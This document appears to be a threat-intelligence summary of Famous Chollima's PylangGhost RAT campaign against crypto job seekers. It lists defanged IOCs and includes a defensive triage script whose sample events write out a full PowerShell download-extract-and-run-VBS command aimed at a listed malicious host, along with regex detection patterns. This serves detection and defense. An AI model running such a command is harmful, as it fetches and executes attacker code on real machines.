Full Report
Learn how the North Korean-aligned Famous Chollima is using a new Python-based RAT, "PylangGhost," to target cryptocurrency and blockchain jobseekers in a campaign affecting users primarily in India.
Analysis Summary
# Threat Actor: Famous Chollima (aka Wagemole)
## Attribution & Identity
* **Attribution:** North Korean-aligned threat actor.
* **Known Aliases/Associations:** Wagemole. The activity may be the work of more than one sub-group.
* **New Development:** In May 2025, identified using a new Python-based RAT named "PylangGhost." Also continues to use the pre-existing Golang-based "GolangGhost" RAT.
## Activity Summary
* The group has been highly active since mid-2024.
* **Primary Campaign:** Deploying fake job advertisements and skill-testing pages to compromise victims. This tactic is part of a two-pronged approach aiming for financial benefit (by harvesting personal information) and implanting malicious "fake employees" in targeted companies.
* **Infection Vector:** Targets are lured to fake skill-testing sites impersonating real companies (e.g., Coinbase, Robinhood, Uniswap). After answering interview questions, the site claims a camera or video driver must be fixed before recording can continue and instructs the target to copy and run a command line (a ClickFix-style lure) that downloads the payload.
* **OS Targeting:** Latest campaigns specifically target Windows and macOS systems; Linux users are not being targeted.
## Tactics, Techniques & Procedures
* **Initial Access:** Spearphishing/Deceptive appearance via fake job interview/skill testing sites.
* **Execution:** Victims are instructed to copy, paste, and run a command line (PowerShell `Invoke-WebRequest` on Windows, `curl` on macOS) that fetches and launches the payload.
* **Delivery Chain / Defense Evasion:** The "driver installation" lure disguises the download. The initial stage retrieves a ZIP archive containing the PylangGhost modules and a VBS file (`update.vbs`); the script unzips the archive and launches a Python interpreter with the RAT entry point (`nvidia.py`), so no conventional executable ever lands on disk.
* **Payloads:** A Golang-based RAT (GolangGhost) and a functionally equivalent Python-based RAT (PylangGhost); PylangGhost is the variant observed on Windows.
* **Components:** Individual modules identifiable by file hash (e.g., `command.py`, `config.py`, `update.vbs`, `nvidia.py`).
## Targeting
* **Sectors:** Individuals with experience in **cryptocurrency and blockchain technologies** (e.g., software engineers, marketers, designers seeking roles at associated firms).
* **Geography:** Predominantly **India** affected based on initial intelligence.
* **Victims:** Real software engineers, marketing employees, designers, and other workers applying for roles advertised by fake recruiters associated with companies like Coinbase, Archblock, Robinhood, Parallel Studios, and Uniswap.
## Tools & Infrastructure
* **Malware families used:** PylangGhost (Python RAT, new in 2025), GolangGhost (Golang RAT, documented previously).
* **Infrastructure (C2 Servers):**
  * hxxp://31[.]57[.]243[.]29:8080
  * hxxp://154[.]58[.]204[.]15:8080
  * hxxp://212[.]81[.]47[.]217:8080
  * hxxp://31[.]57[.]243[.]190:8080
* **Infrastructure (Download Hosts):** api[.]quickcamfix[.]online, api[.]auto-fixer[.]online, api[.]quickdriverupdate[.]online, api[.]camtuneup[.]online, api[.]driversofthub[.]online, api[.]drive-release[.]cloud, api[.]vcamfixer[.]online, api[.]nvidia-drive[.]cloud, api[.]nvidia-release[.]us, api[.]autodriverfix[.]online, api[.]camdriversupport[.]com, api[.]smartdriverfix[.]cloud, api[.]drivercams[.]cloud, api[.]camtechdrivers[.]com, api[.]web-cam[.]cloud, api[.]camera-drive[.]org, api[.]nvidia-release[.]org, api[.]fixdiskpro[.]online, api[.]autocamfixer[.]online
* **Infrastructure (Fake Interview Sites):** krakenhire[.]com, yuga[.]skillquestions[.]com, uniswap[.]speakure[.]com, doodles[.]skillquestions[.]com, www[.]hireviavideo[.]com, kraken[.]livehiringpro[.]com, quiz-nest[.]com, www[.]smartvideohire[.]com, www[.]talent-hiringstep[.]com, provevidskillcheck[.]com, skill[.]vidintermaster[.]com, digitaltalent[.]review, robinhood[.]ecareerscan[.]com, evalswift[.]com, livetalentpro[.]com, quantumnodespro[.]com, evalassesso[.]com, parallel[.]eskillora[.]com, coinbase[.]talentmonitoringtool[.]com, uniswap[.]testforhire[.]com, coinbase[.]talenthiringtool[.]com, crosstheages[.]skillence360[.]com, parallel[.]eskillprov[.]com, assesstrack[.]com, talent-hiringtalk[.]com, uniswap[.]prehireiq[.]com, fast-video-recording[.]com.
## Implications
Famous Chollima demonstrates advanced social engineering capabilities focused on technology sectors, particularly those related to cryptocurrency/blockchain. Their use of platform-specific delivery commands (PowerShell for Windows, Bash for macOS) and the maintenance of functionally equivalent RATs in two languages (Go and Python) show adaptability and a commitment to keeping operational access across the operating systems their victims use. The secondary objective of placing "fake employees" inside targeted companies turns a compromised applicant into a long-lived insider threat.
## Mitigations
* **Security Awareness Training:** Educate employees, especially job applicants and technical staff, on recognizing sophisticated social engineering lures, such as fake job application portals or required "driver updates."
* **Execution Control:** Implement strict controls (e.g., AppLocker, Windows Defender Application Control) to block script hosts (`wscript.exe`, `cscript.exe`), PowerShell and Python interpreters from running out of user-writable locations such as the user profile, `%TEMP%` and download directories.
* **Command Line Scrutiny:** Monitor for suspicious command-line usage, specifically `Invoke-WebRequest` or `curl` invocations originating from an interactive user session, and in particular one-liners that also decompress a ZIP archive or launch a `.vbs` file immediately after the download.
* **Network Monitoring:** Monitor outbound connections to the known C2 IP addresses and suspicious download domains, especially those associated with driver/webcam support or auto-fix utilities.
* **Endpoint Defense:** Ensure endpoint security solutions specifically detect and block Python execution chains initiated in this manner and flag known malware hashes associated with PylangGhost/GolangGhost modules.
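The command-line and network monitoring items above can be turned into a small triage routine. The following is an added example written for this summary, not code from the Talos report or from the actor: it refangs the defanged indicators listed in the Tools & Infrastructure section so they can be matched against telemetry, applies regular expressions for the fetch-and-unzip one-liner, the `.vbs` launcher and a Python interpreter started from a user-writable directory, and runs both checks over a handful of constructed process and network events. The event field names (`user`, `image`, `cmdline`, `dest_host`, `dest_port`) and the sample command lines are assumptions modelled on the chain described above, not captured data.

```python
"""Triage sketch for the ClickFix -> PylangGhost chain.

Added example, not code from the report or the actor. Events below are
constructed to resemble EDR/Sysmon output; field names are assumptions.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Defanged indicators copied from the report's infrastructure lists (subset).
C2_SERVERS = [
    "hxxp://31[.]57[.]243[.]29:8080",
    "hxxp://154[.]58[.]204[.]15:8080",
    "hxxp://212[.]81[.]47[.]217:8080",
    "hxxp://31[.]57[.]243[.]190:8080",
]
DOWNLOAD_HOSTS = [
    "api[.]quickcamfix[.]online",
    "api[.]nvidia-release[.]us",
    "api[.]autodriverfix[.]online",
]


def refang(ioc: str) -> str:
    """Undo the hxxp / [.] defanging used in published IOC lists."""
    return ioc.replace("hxxps", "https").replace("hxxp", "http").replace("[.]", ".")


def ioc_host(ioc: str) -> str:
    """Bare host (no scheme, no port) of a defanged URL or domain."""
    s = refang(ioc)
    return (urlsplit(s).hostname if "://" in s else s.split(":")[0]) or ""


BLOCKED_HOSTS = {ioc_host(i) for i in C2_SERVERS + DOWNLOAD_HOSTS}

# Heuristics for the observed execution chain: a fetch-and-unzip one-liner,
# a .vbs launcher, and a Python interpreter run from a user-writable path.
FETCH = re.compile(r"invoke-webrequest|\biwr\b|\bcurl(\.exe)?\b", re.I)
UNZIP = re.compile(r"expand-archive|\bunzip\b|\btar\b\s+-?x", re.I)
VBS = re.compile(r"\b[wc]script(\.exe)?\b.*\.vbs\b", re.I)
PY_USERDIR = re.compile(
    r"python(3|\.exe)?\b.*[\\/](AppData|Temp|Downloads|tmp)[\\/].*\.py\b", re.I)


@dataclass
class ProcessEvent:
    user: str
    image: str
    cmdline: str


@dataclass
class NetEvent:
    image: str
    dest_host: str   # hostname or IP as seen by the sensor
    dest_port: int


def classify_process(ev: ProcessEvent) -> list[str]:
    """Return the stage names a single process-creation event matches."""
    hits = []
    if FETCH.search(ev.cmdline) and UNZIP.search(ev.cmdline):
        hits.append("fetch-and-unzip one-liner")
    if VBS.search(ev.cmdline):
        hits.append("vbs launcher")
    if PY_USERDIR.search(ev.cmdline):
        hits.append("python from user-writable dir")
    return hits


def classify_net(ev: NetEvent) -> list[str]:
    """Flag a connection whose destination is a listed C2 or download host."""
    return ["known C2/download host"] if ev.dest_host.lower() in BLOCKED_HOSTS else []


def triage(events) -> list[tuple[str, list[str]]]:
    """Run each event through the matching classifier; keep only the hits."""
    out = []
    for ev in events:
        hits = classify_process(ev) if isinstance(ev, ProcessEvent) else classify_net(ev)
        if hits:
            out.append((ev.image, hits))
    return out


# Constructed sample telemetry: three suspicious events followed by two benign ones.
SAMPLE = [
    ProcessEvent("dev", "powershell.exe",
                 r'powershell -c "Invoke-WebRequest -Uri http://api.quickcamfix.online/fix.zip '
                 r'-OutFile $env:TEMP\fix.zip; Expand-Archive $env:TEMP\fix.zip $env:TEMP\nv; '
                 r'wscript $env:TEMP\nv\update.vbs"'),
    ProcessEvent("dev", "python.exe",
                 r"C:\Users\dev\AppData\Local\Temp\nv\python.exe C:\Users\dev\AppData\Local\Temp\nv\nvidia.py"),
    NetEvent("python.exe", "31.57.243.29", 8080),
    ProcessEvent("dev", "powershell.exe",
                 r'powershell -c "Invoke-WebRequest https://example.com/report.csv -OutFile report.csv"'),
    NetEvent("chrome.exe", "example.com", 443),
]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE):
        print(f"{image}: {', '.join(hits)}")
```

The benign `Invoke-WebRequest` line is deliberately left unflagged: a download alone is common administrative activity, and the signal in this campaign is the download combined with an archive extraction and a script-host launch in the same command, or a Python interpreter executing out of `%TEMP%`. In production the host match should be fed by the full indicator lists rather than the subset embedded here, and the IP-based C2 entries should also be checked against destination port 8080, which every listed server uses.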